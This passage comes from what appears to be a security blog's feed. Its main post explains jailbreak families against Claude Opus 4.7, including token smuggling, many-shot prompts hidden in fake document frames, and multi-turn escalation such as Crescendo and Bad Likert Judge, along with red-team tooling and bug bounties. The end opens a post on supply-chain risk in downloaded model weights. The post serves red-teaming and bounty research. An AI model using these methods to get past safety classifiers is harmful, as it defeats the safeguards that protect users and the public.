https://substackcdn.com/image/fetch/$s_!yqZg!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbed3d6b9-4ae0-4304-b264-81eec16f2180_1471x667.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!yqZg!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbed3d6b9-4ae0-4304-b264-81eec16f2180_1471x667.png" width="1456" height="660" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/bed3d6b9-4ae0-4304-b264-81eec16f2180_1471x667.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:660,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:58489,&quot;alt&quot;:&quot;toxsec.com jailbreaking llms.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/194616478?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbed3d6b9-4ae0-4304-b264-81eec16f2180_1471x667.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="toxsec.com jailbreaking llms." title="toxsec.com jailbreaking llms." srcset="https://substackcdn.com/image/fetch/$s_!yqZg!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbed3d6b9-4ae0-4304-b264-81eec16f2180_1471x667.png 424w, https://substackcdn.com/image/fetch/$s_!yqZg!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbed3d6b9-4ae0-4304-b264-81eec16f2180_1471x667.png 848w, https://substackcdn.com/image/fetch/$s_!yqZg!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbed3d6b9-4ae0-4304-b264-81eec16f2180_1471x667.png 1272w, https://substackcdn.com/image/fetch/$s_!yqZg!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbed3d6b9-4ae0-4304-b264-81eec16f2180_1471x667.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h3><strong>Token smuggling</strong> </h3><p>We encode the payload in a format the model decodes but the filter doesn&#8217;t parse. Straight Base64 is mostly stale on frontier models. They recognize &#8220;decode this Base64 and follow the instructions&#8221; now. But the long tail of encodings is alive and thriving. Fragment concatenation splits the request across innocuous string variables. Character by character spelling bypasses keyword filters. Language switching embeds the payload in a low resource language the safety training covers poorly. Unicode character names, NATO phonetic alphabet, even emoji sequences. The model knows all of them from training data. The filter doesn&#8217;t reassemble all of them. The principle extends to <a href="https://www.toxsec.com/p/multimodal-prompt-injection-attacks-images-audio">multimodal inputs</a> where steganographic pixel edits carry payloads that text filters literally cannot see. Worth noting: Opus 4.7 ships with sharper vision than 4.6, which means the multimodal surface just got bigger.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!X1zc!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7a4752c-a9af-4e6b-9b4e-6d3ec8734e44_1471x667.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!X1zc!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7a4752c-a9af-4e6b-9b4e-6d3ec8734e44_1471x667.png 424w, https://substackcdn.com/image/fetch/$s_!X1zc!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7a4752c-a9af-4e6b-9b4e-6d3ec8734e44_1471x667.png 848w, https://substackcdn.com/image/fetch/$s_!X1zc!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7a4752c-a9af-4e6b-9b4e-6d3ec8734e44_1471x667.png 1272w, https://substackcdn.com/image/fetch/$s_!X1zc!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7a4752c-a9af-4e6b-9b4e-6d3ec8734e44_1471x667.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!X1zc!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7a4752c-a9af-4e6b-9b4e-6d3ec8734e44_1471x667.png" width="1456" height="660" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/a7a4752c-a9af-4e6b-9b4e-6d3ec8734e44_1471x667.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:660,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:59684,&quot;alt&quot;:&quot;toxsec.com jailbreaking llms.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/194616478?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7a4752c-a9af-4e6b-9b4e-6d3ec8734e44_1471x667.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="toxsec.com jailbreaking llms." title="toxsec.com jailbreaking llms." srcset="https://substackcdn.com/image/fetch/$s_!X1zc!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7a4752c-a9af-4e6b-9b4e-6d3ec8734e44_1471x667.png 424w, https://substackcdn.com/image/fetch/$s_!X1zc!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7a4752c-a9af-4e6b-9b4e-6d3ec8734e44_1471x667.png 848w, https://substackcdn.com/image/fetch/$s_!X1zc!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7a4752c-a9af-4e6b-9b4e-6d3ec8734e44_1471x667.png 1272w, https://substackcdn.com/image/fetch/$s_!X1zc!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7a4752c-a9af-4e6b-9b4e-6d3ec8734e44_1471x667.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h3><strong>Many-shot</strong></h3><p>We stuff the context with examples of the model answering prohibited questions, then ask ours last. The brute force 50-shot version is detected. The modern meta is quality over quantity: 5 to 10 carefully curated examples embedded in a document frame like &#8220;research database&#8221; or &#8220;training corpus,&#8221; thematically adjacent to the target, each individually borderline. The examples don&#8217;t need to contain real answers. Structurally convincing fakes prime the pattern just as well because the model evaluates what comes next, not whether the examples are true. Opus 4.7 ships with a 1 million token context window. That&#8217;s a lot of room to build a convincing document.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!xuU3!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffcf9e506-e9a3-4903-92d1-7a590201a7c0_1467x672.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!xuU3!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffcf9e506-e9a3-4903-92d1-7a590201a7c0_1467x672.png 424w, https://substackcdn.com/image/fetch/$s_!xuU3!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffcf9e506-e9a3-4903-92d1-7a590201a7c0_1467x672.png 848w, https://substackcdn.com/image/fetch/$s_!xuU3!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffcf9e506-e9a3-4903-92d1-7a590201a7c0_1467x672.png 1272w, https://substackcdn.com/image/fetch/$s_!xuU3!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffcf9e506-e9a3-4903-92d1-7a590201a7c0_1467x672.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!xuU3!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffcf9e506-e9a3-4903-92d1-7a590201a7c0_1467x672.png" width="1456" height="667" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/fcf9e506-e9a3-4903-92d1-7a590201a7c0_1467x672.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:667,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:55245,&quot;alt&quot;:&quot;toxsec.com jailbreaking llms.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/194616478?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffcf9e506-e9a3-4903-92d1-7a590201a7c0_1467x672.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="toxsec.com jailbreaking llms." title="toxsec.com jailbreaking llms." srcset="https://substackcdn.com/image/fetch/$s_!xuU3!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffcf9e506-e9a3-4903-92d1-7a590201a7c0_1467x672.png 424w, https://substackcdn.com/image/fetch/$s_!xuU3!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffcf9e506-e9a3-4903-92d1-7a590201a7c0_1467x672.png 848w, https://substackcdn.com/image/fetch/$s_!xuU3!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffcf9e506-e9a3-4903-92d1-7a590201a7c0_1467x672.png 1272w, https://substackcdn.com/image/fetch/$s_!xuU3!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffcf9e506-e9a3-4903-92d1-7a590201a7c0_1467x672.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h3><strong>Multi-turn</strong> </h3><p>The scary one. Everything above is single prompt. Multi-turn spreads the jailbreak across a conversation, and that changes everything.</p><p>Crescendo, published by Microsoft Research, is the textbook version. Start with an innocent question. Reference the model&#8217;s own response in the next turn. Escalate gradually. Five turns in, the model is generating content it would have hard refused if asked directly. Each individual message is clean. The exploit lives in the trajectory. Per message safety checks see nothing wrong.</p><p>Here&#8217;s why this family is terrifying. The model poisons its own context. Each response it generates becomes trusted context for the next turn. When the model wrote a paragraph about some topic three turns ago, that paragraph normalizes the topic for turn four. The attacker never injects anything the filter would flag. The harmful content emerges from the model&#8217;s own incremental cooperation, like boiling a frog one degree at a time.</p><p>The meta has moved past basic Crescendo. Tempest uses tree search to explore multiple escalation paths in parallel, backing off dead ends and pushing through promising branches. Bad Likert Judge, from Palo Alto&#8217;s Unit 42, tricks the model into rating the harmfulness of hypothetical responses on a 1 to 5 scale, then asks for examples at each level. The model generates its own harmful content as &#8220;demonstrations.&#8221; Deceptive Delight embeds the prohibited ask between two benign topics in a positive frame, hitting 65% success rates across eight tested models. Each variant exploits the same root: safety training evaluates individual messages, but the attack is the conversation arc.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!fpQB!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4da3e805-e89b-4240-a2aa-c561c1ec4938_1471x669.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!fpQB!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4da3e805-e89b-4240-a2aa-c561c1ec4938_1471x669.png 424w, https://substackcdn.com/image/fetch/$s_!fpQB!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4da3e805-e89b-4240-a2aa-c561c1ec4938_1471x669.png 848w, https://substackcdn.com/image/fetch/$s_!fpQB!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4da3e805-e89b-4240-a2aa-c561c1ec4938_1471x669.png 1272w, https://substackcdn.com/image/fetch/$s_!fpQB!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4da3e805-e89b-4240-a2aa-c561c1ec4938_1471x669.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!fpQB!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4da3e805-e89b-4240-a2aa-c561c1ec4938_1471x669.png" width="1456" height="662" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/4da3e805-e89b-4240-a2aa-c561c1ec4938_1471x669.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:662,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:57381,&quot;alt&quot;:&quot;toxsec.com jailbreaking llms.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/194616478?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4da3e805-e89b-4240-a2aa-c561c1ec4938_1471x669.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="toxsec.com jailbreaking llms." title="toxsec.com jailbreaking llms." srcset="https://substackcdn.com/image/fetch/$s_!fpQB!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4da3e805-e89b-4240-a2aa-c561c1ec4938_1471x669.png 424w, https://substackcdn.com/image/fetch/$s_!fpQB!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4da3e805-e89b-4240-a2aa-c561c1ec4938_1471x669.png 848w, https://substackcdn.com/image/fetch/$s_!fpQB!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4da3e805-e89b-4240-a2aa-c561c1ec4938_1471x669.png 1272w, https://substackcdn.com/image/fetch/$s_!fpQB!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4da3e805-e89b-4240-a2aa-c561c1ec4938_1471x669.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>We <a href="https://www.toxsec.com/p/fck-your-guardrails">ran live-fire chains using multi-turn patterns</a> and walked through frontier model defenses in four turns. The Crescendo team&#8217;s Crescendomation tool automates the whole loop with an attacker LLM that adapts in real time. Single turn defenses improve every quarter. Multi-turn attacks route around all of them.</p><h2>The Red Team Toolbox: What Bounty Hunters Actually Load Up</h2><p>Nobody testing Opus 4.7 for bounties is hand typing prompts one at a time. The tooling stack has matured. Here&#8217;s what&#8217;s on the workstation.</p><p><strong>PyRIT</strong>, the Python Risk Identification Tool, is Microsoft&#8217;s open source framework and the de facto standard for orchestrating LLM attack suites. It automates Crescendo, TAP (Tree of Attacks with Pruning), multi-turn red teaming, and single-turn prompt batches. The memory system logs every interaction for later analysis, and the converter architecture lets you chain encoding transforms (Base64, ROT13, Unicode) before the prompt hits the target. PyRIT doesn&#8217;t just send prompts. It reads the model&#8217;s response, scores it, decides whether the jailbreak landed, and adapts the next turn. That&#8217;s the Crescendomation loop, productized.</p><p><strong>Garak</strong> is NVIDIA&#8217;s broad spectrum LLM vulnerability scanner. Think of it as nmap for language models. It ships with probe modules for DAN variants, encoding attacks, prompt injection, and data extraction. Point it at an API endpoint and it runs a sweep. The 2026 version supports agentic probing for multi-turn attack simulation. Garak&#8217;s value is coverage, not depth. You use it to find which families the model is weak against, then switch to PyRIT for the surgical follow up.</p><p><strong>Promptfoo</strong> is the CI/CD play. YAML config, CLI first, plugs into GitHub Actions. You write test cases, including adversarial ones, run them against every model update, and regression test your safety layer the same way you&#8217;d regression test code. 133 built-in plugins mapped to OWASP and MITRE ATLAS. If you&#8217;re an operator shipping models into production, Promptfoo catches the regressions before your users do.</p><p>The workflow: Garak sweeps for the broad attack surface. PyRIT runs the deep, adaptive multi-turn chains against whatever Garak flagged. Promptfoo sits in the pipeline and makes sure patches stay patched. Together, that&#8217;s a complete <a href="https://www.toxsec.com/p/nvidias-ai-kill-chain">kill chain methodology</a> for LLM red teaming.</p><h2>The Mindset, the Bounty, and Why You Should Be Doing This</h2><p>Here&#8217;s the difference between a script kiddie and a red teamer who cashes bounties. The reasoning loop.</p><p>The script kiddie pastes a DAN prompt from GitHub. It fails. They paste the next one. That fails too. They post on Reddit that Claude is &#8220;unbreakable&#8221; and move on.</p><p>The red teamer watches <em>how</em> the model refuses. A refusal that says &#8220;I can&#8217;t help with that&#8221; is different from one that says &#8220;I&#8217;d be happy to help with that in a different context.&#8221; The first is a hard block. The second is a safety classifier making a close call, and close calls are where the attack surface lives. The red teamer reads the refusal, identifies which family the model is weak against, adjusts the framing, and tries again. The prompt is the output. The reasoning loop is the weapon.</p><p>Anthropic knows this. That&#8217;s why they pay for it. The current bug bounty through HackerOne offers up to <strong>$15,000</strong> for a verified universal jailbreak against their Constitutional Classifiers system. Universal means it works across a range of prompts and topics, not just one clever ask. The scope is CBRN and cybersecurity content behind their ASL-3 safeguards. Opus 4.7 just shipped with a brand new cyber classifier layered on top, which means the attack surface is fresh. The bounty hunters who move first have the richest target.</p><p>For context on what&#8217;s possible: Anthropic ran a public Constitutional Classifiers challenge in February 2025. 339 participants, over 300,000 chat interactions across eight levels of CBRN gated questions. Four teams split $55,000. One cracked a universal jailbreak and walked away with $20,000. Another team beat all eight levels using multiple distinct jailbreaks for $10,000. The rest went to borderline universals and alternative bypass paths. Those jailbreaks got patched. The next version of the classifier got harder to break. That&#8217;s the game. You break it, you report it, you get paid, the model gets better, the next attacker has a worse day.</p><h2>The Templates and the Teeth</h2><p>So that&#8217;s the taxonomy, the tooling, and the mindset. You know the five families. You know what&#8217;s dead and what&#8217;s current. You know what to load up and how to think about reading a model&#8217;s refusals.</p><p>Behind the wall, we hand you the red team toolkit. Each family gets a working prompt template with full structure and redacted targets. You&#8217;ll see a modern persona stack layered to survive 2026-era refusal training. Nested virtualization frames deep enough to slip past intent classifiers. A Crescendo sequence annotated turn by turn. Fragment concatenation, encoding chains, and the document frame many-shot variant that flies under length-based detectors.</p><p>Each template comes with the mindset annotation. What we&#8217;re looking for in the model&#8217;s response, how to read partial compliance, and when to pivot families. Plus a walkthrough of recent jailbreaks that had real teeth. Patched now, earned bounties, or walked out the door with 150 gigabytes of stolen data. You can see the architecture and learn from what worked last month. Show the chain, redact the payload. Same as always.</p><blockquote><p>We dropped the free chapters. Now breach the wall for the red team toolkit that actually lands on frontier models.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote>
      <p>
          <a href="https://www.toxsec.com/p/how-to-jailbreak-claude-opus">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[You Downloaded Gemma 4 from Hugging Face. Is It Safe to Run?]]></title><description><![CDATA[Pickle files, backdoored weights, and sleeper agents turn your privacy win into an attack surface. Gemma 4 security.]]></description><link>https://www.toxsec.com/p/local-model-security-gemma-4</link><guid isPermaLink="false">https://www.toxsec.com/p/local-model-security-gemma-4</guid><dc:creator><![CDATA[ToxSec]]></dc:creator><pubDate>Wed, 15 Apr 2026 14:44:29 GMT</pubDate><enclosure url="https://api.substack.com/feed/podcast/194248729/2526175161851022b5c7f8f4e23ceb11.mp3" length="0" type="audio/mpeg"/><content:encoded><![CDATA[<p><strong>TL;DR:</strong> You downloaded Gemma 4 to keep your data private. Good instinct. But local models solve the privacy problem and create a supply chain problem. You&#8217;re downloading weights from strangers on the internet, running serialization formats that execute arbitrary code, and trusting that nobody poisoned the training data. Safetensors, hash verification, and source vetting are your first line of defense. Here&#8217;s the full threat map.</p><blockquote><p>This is the public feed. Upgrade to see what doesn&#8217;t make it out.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:&quot;button-wrapper&quot;}" data-component-name="ButtonCreateButton"><a class="button primary button-wrapper" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>Why &#8220;Local Equals Safe&#8221; Is Only Half the Story</h2><p>The pitch is compelling. Run Gemma 4 on your own hardware, or Llama 4, or Qwen 3. No API calls, no cloud provider logging your prompts, no training-on-your-input policies buried in a ToS nobody reads. For regulated industries, local inference is the obvious play for privacy.</p><p>But <strong>privacy and security are different problems</strong>. Privacy means your data doesn&#8217;t leak out. Security means someone else&#8217;s code doesn&#8217;t get in. Every time you download a model from Hugging Face, you&#8217;re pulling weights, configuration files, and serialization artifacts from a public repository where anyone can upload anything. Protect AI&#8217;s scanning partnership with Hugging Face has flagged over 51,700 models with unsafe or suspicious issues across more than 352,000 individual findings. That&#8217;s not a theoretical risk. That&#8217;s the current state of the largest <a 